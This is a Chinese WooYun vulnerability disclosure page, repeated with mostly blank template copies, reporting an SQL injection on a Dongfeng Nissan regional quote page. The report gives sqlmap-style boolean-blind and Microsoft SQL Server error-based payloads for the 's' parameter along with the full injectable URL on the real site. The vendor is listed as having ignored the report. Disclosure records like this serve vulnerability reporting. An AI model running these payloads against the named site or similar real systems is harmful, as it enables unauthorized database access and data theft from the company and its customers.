东风日产主站 SQL注射漏洞 | wooyun-2015-098556| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098556

漏洞标题：东风日产主站 SQL注射漏洞

漏洞作者： Catsay

提交时间：2015-02-28 16:25

修复时间：2015-03-05 16:26

公开时间：2015-03-05 16:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-28：细节已通知厂商并且等待厂商处理中
2015-03-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

一个注射射了我一脸

详细说明：

Place: GET
Parameter: s
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=370Z' AND 7554=7554 AND 'oliN'='oliN&b=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: s=370Z' AND 7376=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(110)+CHAR(106
)+CHAR(58)+(SELECT (CASE WHEN (7376=7376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR
(58)+CHAR(97)+CHAR(110)+CHAR(114)+CHAR(58))) AND 'gcPd'='gcPd&b=0
---

漏洞证明：

就是这么愉快的射了

附上射点：http://www.dongfeng-nissan.com.cn/zh-CN/region/changzhou/quote.aspx?s=370Z&b=0

修复方案：

这个不用我说了

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-03-05 16:26

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098556

漏洞标题：东风日产主站 SQL注射漏洞

相关厂商：dfyb.com

漏洞作者： Catsay

提交时间：2015-02-28 16:25

修复时间：2015-03-05 16:26

公开时间：2015-03-05 16:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098556

漏洞标题：东风日产主站 SQL注射漏洞

相关厂商：dfyb.com

漏洞作者： Catsay

提交时间：2015-02-28 16:25

修复时间：2015-03-05 16:26

公开时间：2015-03-05 16:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-098556"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Catsay@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：